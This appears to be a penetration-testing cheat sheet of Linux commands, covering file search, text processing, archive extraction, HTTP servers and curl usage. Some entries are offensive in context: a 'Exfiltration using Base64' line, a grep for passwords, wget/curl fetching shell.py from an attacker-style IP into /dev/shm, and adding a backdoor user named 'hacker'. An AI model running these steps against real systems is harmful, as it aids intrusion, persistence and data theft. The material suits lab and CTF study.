Linux
PE Tool
Commands
PEASS-ng/linPEAS at master · carlospolop/PEASS-ng
GitHub
1
#Exfiltration using Base64
2
base64 -w 0 file
3
4
#find a file
5
find -maxdepth 1
6
find ./ -type f
7
find ./ -type d
8
find ./ -name abc*
9
grep -lR password *.txt
10
find ./ -name webmin 2>/dev/null
11
12
#query file grep functions
13
cut –d ":" -f 1 /etc/passwd
14
echo "hello::there::firend" | awk –F "::" '{print $1, $3}'
15
cat access.log | cut –d " " -f 1 | sort | uniq –c |sort –urn
16
17
#Get HexDump without new lines
18
xxd -p boot12.bin | tr -d '\n'
19
20
#Count
21
wc -l <file> #Lines
22
wc -c #Chars
23
24
#Sort
25
sort -nr #Sort by number and then reverse
26
cat file | sort | uniq #Sort and delete duplicates
27
28
29
#Compare File
30
comm fileA.txt fileB.txt
31
32
#Download
33
wget 10.10.14.14:8000/shell.py
34
curl -vvv 'https://10.10.14.14:8000/shell.py' -b "cookie" -k -o /dev/shm/shell.py
35
-k => tag in the end to disable ssl checks done by curl
36
37
#Unzipp
38
tar -xvzf /path/to/yourfile.tgz
39
tar -xvjf /path/to/yourfile.tbz
40
bzip2 -d /path/to/yourfile.bz2
41
tar jxf file.tar.bz2
42
gunzip /path/to/yourfile.gz
43
unzip file.zip
44
7z -x file.7z
45
sudo apt-get install xz-utils; unxz file.xz
46
47
#Add new user
48
useradd -p 'openssl passwd -1 <Password>' hacker
49
50
51
#HTTP servers
52
python -m SimpleHTTPServer 80
53
python3 -m http.server
54
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
55
php -S $ip:80
56
57
##Curl
58
#json data
59
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
60
#Auth via JWT
61
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint
62
63
#Send Email
64
sendEmail -t [email protected] -f [email protected] -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content
65
66
#DD copy hex bin file without first X (28) bytes
67
dd if=file.bin bs=28 skip=1 of=blob
68
69
Copied!
Copy link